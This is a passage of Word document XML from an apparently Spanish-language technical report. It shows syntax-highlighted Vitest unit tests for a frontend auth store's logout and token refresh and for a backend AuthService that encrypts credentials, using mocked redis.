      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> store</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">logout</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(store</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">accessToken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toBeNull</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(store</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">isAuthenticated</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(api</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">defaults</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">common</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Authorization'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toBeUndefined</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">unmount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'refresh automático se programa al hacer login'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loginResponse </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { accessToken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'token-v1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { id</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username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'u'</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refreshResponse </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { accessToken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'token-v2'</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vi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mocked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(api</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">post</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mockResolvedValueOnce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(loginResponse)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mockResolvedValueOnce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(refreshResponse)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [store</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> app] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">withSetup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">useAuthStore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store</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'user'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'pass'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Avanzar 10 minutos para disparar el refresh</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    vi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">advanceTimersByTime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normal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nextTick</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(api</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">post</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toHaveBeenCalledWith</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'/auth/refresh'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      {}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      { withCredentials</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(store</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">accessToken</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'token-v2'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">unmount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01"/>
    <w:bookmarkStart w:id="202" w:name="X317ec0632e222a715e26c5021b03dcc0753a0d6"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12.1.2 Backend: Inyección de Dependencias y Mocks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Los tests unitarios del backend siguen el principio de inyección de dependencias, permitiendo sustituir implementaciones reales por mocks controlados. Para librerías externas como imapflow y Nodemailer, se utilizan mocks de módulo de Vitest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[297]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// packages/api/src/services/__tests__/auth.spec.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> vi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 AuthService } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'../auth'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Mock de redis</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">vi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'../../config/redis'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redis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    setex</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mockResolvedValue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'OK'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    get</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del</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mockResolvedValue</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FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">describe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'AuthService'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describe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'encryptCredentials'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'encripta y puede desencriptar credenciales correctamente'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plain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'password123!@#'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> encrypted </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> AuthService</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">encryptCredentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(plain)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">expect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(encrypted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ciphertext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toBeDefined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(encrypted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">iv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toBeDefined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(encrypted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">tag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toBeDefined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(encrypted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ciphertext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toBe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(plain)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> decrypted </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
